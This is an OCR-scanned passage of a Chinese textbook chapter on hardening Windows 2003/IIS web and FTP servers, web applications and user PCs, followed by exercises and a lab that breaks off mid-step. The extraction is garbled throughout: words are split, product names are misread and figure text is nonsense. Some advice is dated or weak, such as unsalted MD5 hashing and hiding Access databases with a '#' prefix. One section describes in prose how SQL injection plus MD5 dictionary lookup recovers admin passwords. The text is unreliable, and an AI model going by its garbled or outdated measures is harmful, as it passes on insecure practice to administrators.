审核 策略 开启 后 ,作为 服务 器 管理 员 ,在 维护 管理 服务 器 的 过 程 中 应 经 常 查看 事件 日 
志 , 了 解 和 掌握 服务 器 的 安全 状态 ,以 及 是 否 有 入 侵 的 痕迹 。 


4.3.7 Web !j FTP 服务 器 额外 的 安全 设置 


前 面 介绍 了 保障 服务 器 安全 的 一 些 常用 的 安全 措施 ,下 面 针 对 Web 服务 器 和 FTP 服 
务 器 ,介绍 与 这 些 服务 器 自身 特色 相关 的 一 些 安全 设置 和 安全 保障 措施 。 

1. Web 服务 器 额外 的 安全 设置 

(1) 重新 创建 网 站 的 根 目录 ,并 将 US 默认 创建 的 Web 站 点 的 根 目录 及 虚拟 目录 全 部 
删除 。 

HS 服务 安装 完成 后 ,会 同时 创建 一 个 默认 的 Web 站 点 ,在 该 站 点 下 ,还 会 创建 一 些 默 
认 的 虚拟 目录 ,比如 HS Admin 虚拟 目录 。IIS Admin 虚拟 目录 对 应 的 真实 目录 就 是 C:\ 
Inetpub\AdminScripts 目录 ,在 该 目录 下 保存 有 大 量 对 Web 服务 器 和 FTP 服务 器 进行 远 
程 管理 的 VBScript 脚本 程序 。 这 些 脚本 程序 在 方便 远程 管理 的 同时 ,也 很 容易 被 黑客 所 利 
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用 ,因此 ,为 保证 Web 服务 器 的 安全 性 ,应 将 其 彻底 删除 。 

在 删除 默认 Web 站 点 根 目录 之 前 .首先 创建 一 个 新 的 根 目录 ,比如 D:\mywebsite, 然 
后 将 默认 Web 站 点 的 根 目录 修改 为 新 的 站 点 根 目 录 。 然 后 在 HS 管理 器 中 ,将 默认 创建 的 
虚拟 目录 全 部 删除 。 

由 于 默认 FTP 站 点 的 根 目录 为 C:\Inetpub\ftproot', 在 删除 C:\Inetpub 文件 夹 之 前 ， 
还 应 先 将 FTP 站 点 的 根 目录 设置 修改 为 新 创建 的 根 目录 (比如 D:\ftproot) ,最 后 再 将 C:\ 
Inetpub 文件 夹 整体 删除 。 

(2) 删除 不 需要 的 应 用 程序 扩展 。 

在 Internet 信息 服务 (IIS) 管 理 器 中 , 右 击 * 默 认 网 站 ?选项 ,打开 对 网 站 属性 的 设置 对 
话 框 , 选 择 * 主 目录 ”选项 卡 ,然后 单 击 * 配 置 "按钮 ,此 时 将 打开 * 应 用 程序 配置 "对 话 框 , 如 
图 4. 20 所 示 。 

默认 情况 下 ,创建 了 很 多 应 用 程序 扩展 映射 ,这 些 应 用 程序 扩展 存在 安全 漏洞 的 可 能 ， 
为 安全 起 见 ,通常 只 保留 常用 的 应 用 程序 扩展 ,对 于 不 常用 的 或 网 站 根本 不 使 用 的 一 律 
删除 。 

对 于 ASP 网 页 的 解析 ,其 ISAPI 执行 引擎 为 asp. dl。 对 于 ASP 网 站 ,其 应 用 程序 扩 
展 通常 只 需 保 留 . asp 和 . asa 即 可 ,其 余 的 均 可 删除 。 保 留 . NET 方面 的 应 用 程序 扩展 。 

(3) 设置 ASP 调试 和 脚本 错误 消息 。 

在 如 图 4. 20 所 示 的 配置 界面 中 ,选择 "调试 ?选项 卡 ,可 切换 到 对 ASP 调试 和 脚本 错误 
消息 的 设置 界面 ,如 图 4. 21 所 示 。 


应 用 程序 配置 xj 应 用 程序 配置 xj 
mn a wt | 


图 4.20 管理 应 用 程序 扩展 图 4.21 设置 调试 标志 和 脚本 错误 消息 


在 ASP 编程 调试 运行 阶段 ,为 便于 发 现 ASP 运行 出 错 的 原因 和 位 置 ,在 调试 运行 阶 
段 , 通 常 开启 了 ASP 服务 器 端 脚本 调试 和 ASP 客户 端 脚本 调试 功能 。 但 在 服务 器 正式 运 
行 阶段 ,必须 关闭 ASP 服务 器 端 脚本 调试 和 ASP 客户 端 脚本 调试 功能 ,以 防止 ASP 代码 
出 错时 ,造成 ASP 源 代码 泄露 。 

另外 ,为 安全 起 见 ,不 能 将 ASP 脚本 出 错时 的 详细 错误 消息 发 送 到 客户 端 , 此 时 应 将 其 
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设置 为 “向 客户 端 发 送 下 列 文本 错误 消息 : "选项 。 
在 编写 ASP 网 页 代码 时 ,应 在 ASP 代码 的 最 开头 增添 “On Error Resume Next” 语 句 ， 
是 项 出 错 信息 。 
(4) 关闭 不 用 的 Web 服务 扩展 。 
从 Windows 2003 Server 开始 ,新 增 了 Web 服务 扩展 控制 ,用 户 可 根据 需要 开启 或 禁 
用 某 类 Web 服务 扩展 。 某 类 Web 服务 扩展 被 禁用 后 ,这 类 网 页 将 不 再 提供 解析 服务 。 
在 IIS 管理 器 中 ,对 Web 服务 扩展 的 设置 界面 如 图 4. 22 所 示 。 


W Internet 信息 服务 (115) 管 理 器 
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Ë) meme 数据 连接 器 
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图 4.22 设置 Web 服务 扩展 


(5) 防止 Access 数据 库 文件 被 下 载 ,保障 网 站 后 台数 据 库 的 安全 。 

对 于 一 些小 型 应 用 网 站 ,通常 采用 Access 数据 库 来 作为 网 站 的 后 台数 据 库 。 一 个 
Access 数据 库 对 应 着 一 个 扩展 名 为 . mdb 的 数据 库 文件 。 

Access 数据 库 在 运行 期 间 还 要 生成 扩展 名 为 . ldb 的 临时 文件 ,因此 ,Access 数据 库 文 
件 必 须 单 独 保存 在 一 个 子 文件 夹 中 ,以 方便 对 权限 的 设置 。 

一 般 情况 下 ,只 要 知道 数据 库 的 URL 路 径 , 即 可 使 用 FlashGet 迅雷 等 下 载 工具 软件 
将 网 站 的 后 台数 据 库 下 载 下 来 。 后 台数 据 库 能 被 下 载 ,这 对 于 网 站 的 安全 是 一 种 可 怕 的 灾 
难 ,必须 想 办 法 禁止 下 载 。 

目前 ,很 多 站 点 的 解决 办 法 是 将 数据 库 的 扩展 名 更 改 为 . asp, 这 种 解决 办 法 能 防止 利用 
IE 浏览 器 来 下 载 后 台数 据 库 ,但 若 使 用 FlashGet 迅雷 等 专业 下 载 工具 软件 仍 能 正常 下 载 。 
因此 ,可 在 数据 库 命名 时 ,在 数据 库 名 的 最 开头 前 缀 一 个 "# "字符 ,并 将 扩展 名 命名 为 . asp, 
比如 命名 为 “ 共 mywebdata. asp”, 这 样 就 能 在 一 定 程度 上 防止 数据 库 被 下 载 。 在 URL 路 径 
中 ,“# ?字符 被 视 为 URL 结束 的 字符 。 

另外 ,还 可 在 Access 应 用 软件 中 设置 Access 数据 库 的 访问 密码 ,这 样 , 即 使 数据 库 被 
下 载 ,也 可 在 一 定 程 度 上 防止 数据 泄密 。 

(6) 对 不 同 的 网 站 使 用 不 同 的 应 用 程序 池 。 

同一 台 Web 服务 器 可 配置 和 创建 出 多 个 Web 站 点 。 从 Windows 2003 Server 的 
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HS 6. 0 开始, 新 增 了 应 用 程序 池 管 理 ,这 是 HS 6.0 的 一 大 特色 和 功能 改进 。 不 同 网 站 使 用 
不 同 的 应 用 程序 池 , 可 避免 一 个 网 站 应 用 程序 的 错误 所 导致 的 服务 进程 崩溃 ,影响 到 其 他 网 
站 的 正常 运行 ,从 而 提高 网 站 的 安全 性 和 稳定 性 。 
2. FTP 服务 器 额外 的 安全 设置 
对 于 FTP 站 点 的 安全 ,除了 给 FTP 站 点 根 目录 及 其 子 目录 ,针对 不 同 用 户 设置 不 同 的 
访问 权限 之 外 ,为 提高 FTP 站 点 数据 的 安全 性 ,通常 应 禁止 匿名 账户 登录 。 
对 FTP 站 点 是 否 允 许 匿名 账户 登录 连接 的 设置 界面 如 图 4. 23 所 示 。 
EE| 
IP 站 点 “安全 帐户 | 消息 | 主 目录 | 目录 安全 性 | 


对 汇 名 访问 使 用 下 列 Windows 用 户 帐 户 ; 


取消 J AW 帮助 


图 4.23 设置 FTP 是 否 允 许 匿名 连接 


4.4 Web 应 用 程序 的 安全 措施 


本 节 主 要 介绍 提高 Web 应 用 程序 安全 性 常用 的 一 些 措施 和 实现 方法 。 
4.4.1 防止 SQL 注入 攻击 


SQL 注入 攻击 是 W eb 应 用 程序 面临 的 最 普遍 、 也 是 最 严重 的 安全 威胁 之 一 ,因此 ,在 
编写 Web 应 用 程序 时 一 定 要 严谨 ,一 定 要 进行 防 SQL 注入 攻击 的 预防 和 处 理 。 有 关 SQL 
注入 攻击 的 防范 方法 ,可 参阅 2.7. 3 小 节 介 绍 的 SQL 注入 攻击 的 防范 。 


4.4.2 合理 分 配 数 据 库 账户 权限 


对 于 Web 应 用 程序 的 后 台数 据 库 , 在 条 件 允 许 的 情况 下 ,尽量 不 要 采用 Access 数据 
库 ,而 要 采用 SQL Server 2000/2005/2008、Oracle 或 DB2 这 类 服务 器 类 型 的 数据 库 。 

服务 器 类 型 的 后 台数 据 库 除了 支持 更 大 数据 量 的 存储 和 高 负荷 支持 能 力 外 ,还 具有 更 
高 的 安全 性 ,支持 数据 库 账户 的 详细 权限 控制 。 

Web 应 用 程序 在 连接 后 台数 据 库 时 ,一般 编程 人 员 喜 欢 使 用 数据 库 的 sa 账户 (最 高 权 
限 账户 ) ,这 种 做 法 是 不 安全 的 。 一 旦 攻击 者 通过 某 个 安全 设置 做 得 不 好 的 站 点 获得 该 sa 
账户 的 密码 之 后 ,整个 数据 库 服 务 器 就 被 攻击 者 所 掌控 了 ,数据库 服 务 器 中 的 全 部 数据 库 被 
泄密 。 
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比较 安全 的 做 法 是 为 每 一 个 Web 站 点 在 数据 库 服 务 器 中 创建 一 个 数据 库 ,并 创建 一 个 
新 的 数据 库 账 户 , 同 时 设置 该 数据 库 账 户 只 能 存 取 访问 该 站 点 的 数据 库 , 然 后 Web 应 用 程 
序 使 用 新 创建 的 数据 库 账 户 来 连接 访问 站 点 的 后 台数 据 库 。 


4.4.3 使 用 加 密 技 术 和 强 密码 保护 账户 安全 


对 于 Web 应 用 程序 的 后 台数 据 库 中 的 一 些 敏感 数据 (比如 后 台 发 布 系统 中 的 账户 密 
码 ) ,必须 采取 加 密 存 储 , 以 保护 数据 的 机 密 性 ,防止 数据 泄密 。 加 密 算法 应 是 单 向 不 
TÉR. fg Web 应 用 程序 开发 中 ,也 经 常 使 用 HASH 算法 (MD5) 来 对 数据 进行 加 密 
存储 。 

对 于 Web 应 用 程序 的 后 台 发 布 系统 的 管理 账户 ,其 账户 密码 除 采 用 加 密 存储 之 外 , 账 
户 密码 还 必须 设置 为 一 个 复杂 的 ,强壮 的 密码 ,以 防止 攻击 者 猜测 密码 。 

即使 账户 密码 采用 了 加 密 方 式 存储 ,比如 采用 MD5 算法 进行 加 密 , 若 账户 的 密码 值 设 
置 得 比较 简单 ,攻击 者 也 可 采用 穷 举 法 或 借助 MD5 密码 字典 ,通过 比 对 MD5 密码 值 来 猜 
测 出 账户 的 真实 密码 。 

车 一 个 网 站 存在 SQL 注入 漏洞 ,后 台 管 理 账户 虽 采 用 MD5 算法 加 密 ,但 账户 密码 设置 
比较 简单 ,此 时 可 采用 以 下 方法 来 获得 后 台 管 理 账户 的 登录 密码 。 

首先 利用 SQL 注入 攻击 的 方式 ,获得 后 台数 据 库 中 登录 的 账户 名 和 密码 的 MD5 值 。 
然后 利用 MD5 密码 字典 ,或 者 利用 http://www. md5. net/ 网 站 提供 的 MD5 Cracker 功 
能 ,获得 MD5 密 钥 串 对 应 的 密码 原文 。 

从 中 可 见 ,在 创建 后 台数 据 库 时 ,用 于 存储 账户 信息 的 数据 表 名 ,以 及 存储 用 户 名 和 密 
码 的 字段 名 ,在 命名 上 也 要 引起 注意 ,尽量 不 要 使 用 攻击 者 容易 猜 到 的 常规 名 称 ( 比 如 ， 


userinfo, user „username ‚password ,pass 或 pwd 等 )。 


4.4.4 使 用 访问 控制 提升 发 布 后 台 的 安全 性 


对 Web 应 用 程序 的 后 台 管 理 系统 ,除了 采用 加 密 技术 和 强 密码 来 提升 其 安全 性 以 外 ， 
还 可 使 用 访问 控制 技术 来 进一步 提升 系统 的 安全 性 。 

在 登录 后 台 管理 系统 时 ,可 首先 判断 登录 者 的 IP 地 址 是 否 属于 允许 登录 的 IP 地 址 范 
围 ,若是 , 则 继续 进行 正常 的 登录 判断 处 理 ; 若 不 是 , 则 终止 系统 的 登录 和 判断 处 理 , 从 而 实 
现 阻止 非 授 权 的 登录 访问 。 

除了 使 用 访问 控制 来 提升 安全 性 之 外 ,对 于 后 台 管 理 系 统 的 不 同 账户 ,还 应 有 相应 的 权 
限 控制 和 管理 ,以 防止 一 个 账户 泄露 之 后 ,整个 系统 均 失控 的 局 面 。 


4.5 用 户主 机 的 安全 防范 


用 户主 机 系统 的 安全 也 是 网 络 安全 的 一 部 分 。 对 于 用 户主 机 系统 的 安全 :总体 上 可 参 
照 服务 器 的 安全 措施 来 做 。 下 面 简 要 介绍 加 强 用 户主 机 安全 常用 的 一 些 安全 措施 。 
(1) 使 用 正版 操作 系统 和 正版 软件 。 
使 用 正版 操作 系统 和 正版 软件 有 助 于 保证 用 户主 机 系统 的 安全 和 稳定 运行 。 目 前 ,很 
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多 非 品牌 计算 机 的 主机 系统 是 由 计算 机 经 销 商 安装 的 非 正 版 操作 系统 和 非 正 版 软件 ,这 类 
系统 中 一 般 含 有 或 多 或 少 的 恶意 插件 。 装 机 方式 多 采用 无 人 值守 安装 方式 ,这 样 安装 的 系 
统 , 其 系统 管理 员 账 户 的 密码 为 空 ,并 且 设 置 为 自动 登录 。 因 此 ,系统 的 安全 性 是 相当 低 的 ， 
因特网 上 的 攻击 者 可 轻易 控制 这 类 用 户主 机 系统 ,获取 所 感 兴趣 的 数据 资料 。 

对 于 这 类 主机 系统 ,为 提高 其 安全 性 ,应 立即 设置 修改 Administrator 账户 的 密码 ,并 利 
用 360 安全 卫士 ,清除 系统 中 可 能 存在 的 恶意 插件 或 木马 。 

(2) 安装 网 络 安全 保护 软件 。 

安装 安全 保护 软件 是 提升 用 户主 机 系统 安全 的 有 力 保障 。 目 前 常用 的 安全 保护 软件 主 
要 是 360 安全 卫士 . 杀 病 毒 软件 和 防火 墙 软 件 。 

杀 病 毒 软件 只 能 安装 一 款 , 以 防止 杀 病 毒 软件 进程 彼此 间 的 相互 干扰 ,使 系统 不 能 稳定 
正常 的 运行 。 

相关 软件 安装 好 后 ,在 使 用 期 间 , 还 应 注意 每 隔 一 定时 间 升 级 病毒 或 木马 特征 库 , 并 对 
系统 进行 全 盘 扫 描 检 查 ,以 清除 系统 中 可 能 存在 的 病毒 ,木马 或 恶意 插件 。 

(3) 给 操作 系统 和 应 用 程序 及 时 打 补 下 ,修复 各 种 漏洞 。 

现在 有 了 360 安全 卫士 ,对 系统 的 安全 扫描 检查 、 清 除 木 马 和 恶意 插件 操作 , 变 得 相对 
简单 和 轻松 多 了 。 利 用 360 安全 卫士 还 可 自动 检查 操作 系统 和 各 种 应 用 程序 是 否 有 可 用 的 
漏洞 修复 补丁 ,并 可 实现 自动 下 载 和 安装 漏洞 修复 补丁 。 

在 应 用 程序 方面 ,Flash 播放 器 的 安全 漏洞 较 多 ,要 注意 及 时 更 新 Flash 播放 器 软件 。 

(4) 合理 安装 和 管理 应 用 程序 ,对 不 用 的 应 用 程序 及 时 删除 。 

系统 安装 的 应 用 软件 越 多 ,存在 安全 漏洞 的 可 能 性 也 就 越 大 ,对 不 用 的 应 用 程序 应 及 时 
删除 。 另 外 ,应 用 程序 安装 多 了 ,系统 的 自 启动 程序 项 一 般 也 会 增多 ,所 占用 的 磁盘 空间 也 
会 增 大 ,这 会 降低 系统 的 启动 和 运行 速度 。 

(5) 安全 上 网 ,避免 访问 一 些 灰色 网 站 。 

目前 因特网 中 的 很 多 软件 下 载 站 点 ,在 软件 下 载 地 址 提供 栏目 中 ,通常 混杂 了 大 量 其 他 
软件 的 下 载 链 接 。 用 户 在 单 击 下 载 链接 时 要 注意 辨别 ,否则 很 容易 下 载 到 恶意 插件 ,或 在 不 
知 不 觉 中 , 因 误 单 击 某 个 链接 ,系统 被 植 人 木马 。 

一 些 灰 色 网 站 的 视频 播放 ,通常 要 求 安装 专门 的 视频 播放 器 ,这 些 视频 播放 器 的 安全 性 
没有 任何 保障 ,甚至 播放 器 本 身 就 是 一 款 木马 软件 或 木马 下 载 软件 ,只 不 过 被 伪装 成 可 以 播 
放 的 视频 。 

目前 因特网 上 大 量 存在 各 种 各 样 的 偷窥 软件 .这些 偷 窥 软 件 的 安装 程序 通常 被 伪装 成 
图 片 或 小 动画 ,攻击 者 通过 QQ 或 邮件 进行 传播 ,因此 ,在 进行 QQ 聊天 时 ,不 要 轻易 接收 和 
打开 QQ 好 友 发 来 的 图 片 .小 动画 或 一 些 扩展 名 为 . exe 的 文件 (exe 可 执行 文件 通过 特殊 处 
理 , 可 伪装 成 可 显示 的 图 片 或 可 播放 的 小 动画 ) ,系统 一旦 被 植 入 偷窥 软件 , 则 用 户主 机 系统 
就 被 攻击 者 所 掌控 ,攻击 者 可 远程 全 面 控制 和 监控 用 户主 机 ,甚至 能 强行 悄悄 开启 用 户主 机 
上 的 摄像 头 ,偷窥 对 方 的 隐私 ,并 且 还 可 进行 录像 或 截图 。 

(6) 合理 使 用 基于 P2P 的 软件 ,注意 对 自己 敏感 资料 和 隐私 的 安全 保护 。 

目前 用 户 普 遍 安装 并 使 用 了 基于 P2P 的 下 载 软件 ,比如 迅雷 ,电驴 等 ,这 类 软件 具有 自 
动 上 传 分 享 其 他 用 户 需 要 下 载 的 资料 的 能 力 , 因 此 ,要 注意 不 要 将 自己 敏感 的 数据 资料 , 放 
在 P2P 下 载 软件 的 工作 目录 中 。 
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对 于 保密 性 的 数据 资料 或 有 关 自 己 隐私 的 数据 资料 ,出 于 安全 考虑 ,建议 采用 加 密 存储 
方式 保存 。 最 简单 的 一 种 实现 方式 就 是 利用 Winrar 压缩 软件 ,将 这 类 数据 资料 ,进行 加 密 
压缩 ,打包 生成 扩展 名 为 . rar 的 压缩 文件 ,然后 再 将 原始 文件 删除 ,并 牢记 密码 。 另 一 种 更 
高 级 的 加 密 方 式 是 使 用 PGP 加 密 软件 ,对 重要 数据 进行 基于 数字 证 书 的 非 对 称 加 密 。 这 种 
加 密 方式 ,安全 性 很 高 ,但 数据 恢复 还 原 过 程 相对 要 复杂 一 些 。 


ps 


D 


习 题 4 


. 为 提高 服务 器 数据 的 安全 性 ,以 下 对 服务 器 硬盘 的 描述 不 正确 的 是 ( Js 


A. 服务 器 通常 应 配置 至 少 3 块 同 型 号 的 硬盘 ,以 使 配置 RAID 5 磁盘 阵列 
B. 服务 器 硬盘 通常 选择 SAS 或 SATA 硬盘 

C. SATA 接口 的 硬盘 比 SAS 接口 的 硬盘 性 能 好 

D. SAS 接口 的 硬盘 目前 转速 通常 为 15000 转 或 10000 转 


. 要 扩展 服务 器 的 数据 存储 空间 ,以 下 方法 中 ,不 正确 或 不 可 行 的 是 (  )。 


A. 在 硬盘 插 模 有 剩余 的 情况 下 ,可 通过 新 增 硬盘 来 实现 

B. 可 通过 外 接 磁盘 阵列 柜 来 扩充 服务 器 的 数据 存储 空间 

C. 使 用 IP SAN 系统 ,为 服务 器 提供 存储 空间 

D. 对 于 做 了 RAID 5 的 磁盘 阵列 ,将 其 中 两 块 硬盘 替换 为 大 空 量 的 硬盘 


. 要 为 超过 4 台 服 务 器 提供 存储 空间 扩充 ,最 佳 的 实现 方法 是 ( ) 。 


A. 配置 IP SAN 或 FC SAN 系统 

B. 配置 磁盘 阵列 柜 

C. 分 别 为 每 一 台 要 扩容 的 服务 器 增 配 至 少 2 块 硬盘 
D. 分 别 为 每 一 台 要 扩容 的 服务 器 增 配 至 少 3 块 硬盘 


. 一 台 具 有 双 卡 双 接 口 的 磁盘 阵列 柜 ,最 多 可 为 ( ) 台 服务 器 提供 存储 空间 。 


A. 1 B. 2 C. 3 D. 4 


.出 于 服务 器 安全 性 考虑 ,以 下 对 服务 器 磁盘 分 区 的 描述 ,不 正确 的 是 ( o 


.对 于 Windows 系统 ,安装 操作 系统 的 C 盘 必须 采用 N TFS 分 区 格式 

对 于 Windows 系统 ,用 于 存储 服务 器 数据 的 分 区 也 必须 采用 N TFS 分 区 格式 
.对 于 Windows 系统 ,用 于 存储 ghost 映像 文件 的 分 区 可 以 采用 FAT 32 分 区 格式 
.对 于 Windows 系统 ,用 于 安装 操作 系统 的 分 区 和 存储 数据 的 分 区 可 以 采用 
FAT 32 格式 


g ° = > 


. 为 提高 服务 器 系统 的 安全 性 ,以 下 方法 或 措施 中 ,不 可 取 或 无 助 于 提高 安全 性 的 


.及 时 为 系统 打 补 丁 ,修复 各 类 系统 漏洞 

. 禁用 或 停 用 终端 服务 .计划 任务 服务 Telnet 等 服务 

. 将 Web 服务 的 端口 号 更 改 为 TCP 8080 

. 清理 系统 账户 ,删除 多 余 或 不 用 的 账户 ,并 为 每 一 账户 设置 一 个 复杂 的 密码 
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T. 以 下 措施 中 ,无 助 于 提升 服务 器 系统 的 安全 性 的 是 ( Ns 


A. 禁止 自动 共享 B. 禁止 运行 Shell 和 批 处 理 文件 
C. 使 IIS 支持 中 文 路 径 D. 将 管理 员 账 户 更 名 


8. 关于 Windows 系统 账户 的 安全 管理 ,以 下 描述 中 ,正确 的 是 ( ys 
A. Windows 系统 的 管理 员 账 户 是 Administrators ,可 以 更 名 
B. Windows 系统 的 管理 员 账 户 是 Administrator, 可 以 更 名 
C. Windows 系统 的 管理 员 账 户 不 可 以 更 名 ,系统 根据 名 称 识别 账户 是 否 是 管理 员 
账户 
D. Windows 系统 管理 员 账 户 更 名 后 ,不 能 再 创建 名 为 Administrator 的 账户 
9. 一 台 主 机 名 为 win2k3 的 Web 服务 器 ,提供 静态 网 页 和 ASP 动态 网 页 的 解析 ,其 
Web 站 点 根 目录 为 D: Nmywebsite ,为 使 用 户 能 正常 访问 该 网 站 ,出 于 安全 考虑 , 除 管理 员 
账户 对 此 文件 夹具 有 完全 权限 之 外 ,还 必须 且 只 能 设置 ( ) 用 户 对 该 文件 夹具 有 读 的 


权限 。 
A. Administrator B. IWAM win2k3 
C. IUSR_win2k3 D. everyone 
10. 从 Windows 系统 账户 方面 来 提升 服务 器 系统 的 安全 性 ,以 下 方法 不 可 取 或 无 效 的 
是 ( ) 。 


A. 设置 账户 加 锁 策 略 ,3 次 密码 校 验 失败 ,加 锁 账户 30 分 钟 
B. 禁用 或 删除 Guest 账户 
C. 禁用 TsInternetUser 账户 
D. 对 于 系统 所 在 的 分 区 ,设置 仅 允 许 管理 员 对 其 具有 完全 权限 ,其 余 账户 不 允许 
访问 系统 盘 
11. 从 IS 自身 配置 方面 来 提高 Web 服务 器 的 安全 性 ,以 下 方法 不 可 取 或 无 助 于 提升 
安全 性 的 是 ( 
A. 删除 未 用 到 的 应 用 程序 扩展 
B. 关闭 ASP 服务 器 端 脚 本 调试 和 ASP 客户 端 脚本 调试 功能 .并 取消 向 客户 端 发 
送 详细 的 ASP 错误 消息 功能 选项 的 勾 选 
C. 不 同 网 站 使 用 不 同 的 地 址 池 
D. 一 台 Web 服务 器 只 配置 一 个 Web 站 点 
12. 以 下 关于 Web 服务 器 多 站 点 配置 的 描述 ,正确 的 是 ( ) 
A. 一 台 Web 服务 器 可 以 配置 出 多 个 网 站 , 且 每 个 网 站 均 可 以 使 用 TCP 80 端口 
B. 一 台 Web 服务 器 可 以 配置 出 多 个 网 站 ,但 前 提 条 件 是 每 个 网 站 必须 使 用 不 同 
的 TCP 端口 
C. 一 台 Web 服务 器 只 能 配置 出 一 个 Web 网 站 
D. 一 台 Web 服务 器 可 以 通过 安装 多 个 IIS 来 实现 配置 出 多 个 Web 网 站 
13. 对 于 采用 Access 数据 库 的 Web 应 用 .为 防止 Access 数据 库 被 下 载 ,以 下 安全 措施 
中 ,最 有 效 的 是 ( Jo 
A. 将 数据 库 的 扩展 名 更 名 为 . asp 
B. 将 数据 库 的 扩展 名 更 名 为 . dat 
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C. 将 数据 库 单独 放 在 网 站 的 一 个 子 文件 夹 中 
D. 将 数据 库 的 扩展 名 更 名 为 . asp, 并 在 文件 主 名 之 前 ,前 缀 “# ”字符 
14. 为 提高 基于 数据 库 的 Web 应 用 的 安全 性 ,以 下 描述 中 ,不 正确 的 是 ( J 
A. 后 台数 据 库 尽量 避免 使 用 Access 数据 库 
B. 后 台数 据 库 最 好 使 用 SQL Server, Oracle 或 DB2 这 些 大 型 的 服务 器 型 的 数据 库 
C. 若 后 台数 据 库 采用 SQL Server, 则 应 单独 创建 一 个 数据 账户 ,用 作 Web 页 面 连 
接 访问 指定 的 数据 库 , 尽 量 避 免 使 用 sa 账户 连接 访问 数据 库 
D. 数据 库 服 务 器 和 Web 服务 器 必须 安装 在 同一 台 服 务 器 上 ,和 否则 Web 页 面 无 法 
连接 访问 数据 库 
15. 一 台 安 装 了 IIS 的 Web 服务 器 上 同时 安装 了 SQL Server 2005 数据 库 服 务 系统 ， 
SQL Server 作为 该 Web 网 站 的 后 台数 据 库 系统 ,为 提高 该 Web 服务 器 的 安全 性 ,在 该 
Web 服务 器 的 防火 墙 中 配置 只 允许 访问 的 服务 端口 , 则 需要 放行 的 服务 端口 是 ( ”)。 
A. TCP 80 B. TCP 80 和 TCP 1433 
C. TCP 1433 D. TCP 80.TCP 1433 和 UDP 53 
16. 为 使 服务 器 支持 多 网 络 出 口 , 以 下 实现 方法 中 ,不 正确 的 是 ( J 
A. 配置 多 块 网 卡 , 每 块 网 卡 连接 一 个 网 络 出 口 
B. 当 配置 有 多 块 网 卡 时 ,只 能 有 一 块 网 卡 可 以 设置 网 关 地址 ,其 余 网 卡 只 设置 IP 
地 址 ,不 设 网 关 地 址 ,然后 在 服务 器 的 操作 系统 命令 行 ,使 用 route add 命令 添 
加 到 对 应 网 络 的 静态 路 由 
C. 服务 器 可 以 采用 一 个 内 网 地 址 ,然后 在 出 口 防火 墙 或 路 由 器 上 配置 静态 地 址 映 
射 , 将 不 同 网 络 的 公 网 地 址 ,映射 到 服务 器 所 使 用 的 同一 个 内 网 地 址 
D. 服务 器 配置 多 块 网 卡 ,每 块 网 卡 连接 不 同 的 网 络 出 口 。 网 卡 的 IP 地 址 设置 为 
对 应 网 络 的 公 网 地 址 ,并 设置 对 应 的 网 关 地 址 


实 训 4.1 Web 服务 器 安全 设置 


【 实 训 目的 】 掌握 Web 服务 器 安全 设置 的 措施 和 配置 方法 。 

【 实 训 环境 】 在 Windows 2003 Server 十 IIS 环境 中 进行 操作 。 

【 实 训 内 容 与 步骤 】 

(1) 配置 提升 Windows 2003 Server 操作 系统 的 安全 性 。 

D 安装 和 运行 360 安全 卫士 ,对 系统 进行 安全 检查 和 木马 查 杀 , 然 后 对 系统 漏洞 进行 修复 。 

© 在 “管理 工具 ”中 打开 “计算 机 管理 ”. 在 “本 地 用 户 和 组 ”管理 中 ,禁用 Guest 和 
TsInternetUser 账户 。 更 名 管理 员 账 户 , 并 给 管理 员 账 户 设置 一 个 复杂 的 密码 。 

© 配置 Web 站 点 ,确定 Web 站 点 的 根 目录 。 然 后 对 Web 站 点 的 根 目录 设置 访问 权 
限 , 配 置 管理 员 账 户 对 其 具有 完全 权限 ,Internet 匿名 账户 只 具有 读 取 权限 ,其 余 账户 对 该 
文件 夹 不 具有 任何 权限 。 

© 修改 注册 表 , 实 现 禁止 自动 共享 .禁止 运行 Shell 和 批 处 理 、 使 IIS 支持 中 文 路 径 。 

(2) 配置 IS. EA JS 的 安全 性 。 
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O 删除 未 用 到 的 应 用 程序 扩展 。 
@ 关闭 ASP 服务 器 端 脚本 调试 和 ASP 客户 端 脚本 调试 功能 ,并 取消 向 客户 端 发 送 详 
细 的 ASP 错误 消息 功能 选项 的 勾 选 。 


实 训 4.2 ”强化 网 站 发 布 系统 的 安全 性 


【 实 训 目的 】 掌握 提升 网 站 发 布 后 台 安 全 性 常用 的 技术 措施 和 编程 实现 方法 。 

[RIR] 在 Windows 2003 Server HIIS 环境 中 进行 操作 。 网 页 编辑 工具 可 采用 
Dreamweaver 软件 。 

本 实 训 内 容 主要 涉及 的 是 网 页 的 安全 编程 ,未 学 习 ASP 编程 的 ,可 以 不 做 该 实 训 。 

【 实 训 内 容 与 步骤 】 

(1) 配置 创建 一 个 网 站 ,网 站 根 目录 为 D:\mywebsite。 网 站 后 台数 据 库 采用 Access 
数据 库 ,数据 库 文件 保存 在 D:\mywebsite\mydata 文件 夹 中 。 

(2) 打开 Microsoft Office Access 2003 软件 ,在 D:\mywebsite\mydata 文件 夹 中 创建 
一 个 名 为 myscdata. mdb 的 数据 库 文件 ,并 创建 一 个 名 为 userinfo 的 数据 表 文件 ,该 数据 表 
的 字段 分 别 是 id( 自 动 递增 字段 )、username( 文 本 型 )、pwd( 文 本 型 )、powerid( 文 本 型 )、 
enabled( 整 型 )。powerid 字段 用 于 存储 该 账户 可 以 发 布 消 息 到 哪些 栏目 中 , 值 为 **”, 则 可 
以 发 布 到 任何 栏目 。 各 栏目 分 别 使 用 整数 来 代表 ,并 用 “| ?进行 分 隔 。pwd 字段 保存 密码 
的 MD5 Hash ffi. enabled 值 为 1, 表示 账 户 生效 ,为 0, 表 示 账 户 被 禁用 。 

然后 在 该 数据 表 中 添加 一 条 记录 ,记录 内 容 为 : 


admin 472d0b916c0de531fd1eb7ec1b961288 * 1 


(3) 创建 D; Nmywebassist 文件 夹 , 该 文件 夹 用 于 保存 网 站 的 后 台 发 布 系 统 。 然 后 在 
HS 的 网 站 中 创建 添加 虚拟 目录 ,将 该 文件 夹 虚 拟 成 网 站 根 目录 下 的 一 个 虚拟 目录 ,虚拟 目 
录 名 称 命名 为 webassist。 

(4) 配置 以 上 各 文件 夹 的 访问 权限 .并 设置 Internet 匿名 用 户 对 mydata 文件 夹具 有 读 
和 写 的 权限 。 

(5) 启动 Dreamweaver 软件 ,并 创建 一 个 站 点 ,站 点 文件 夹 设置 为 D:\mywebassist。 

(6) 在 Dreamweaver 软件 中 创建 和 编辑 后 台 发 布 系统 的 登录 表单 页 面 login. asp 和 登 
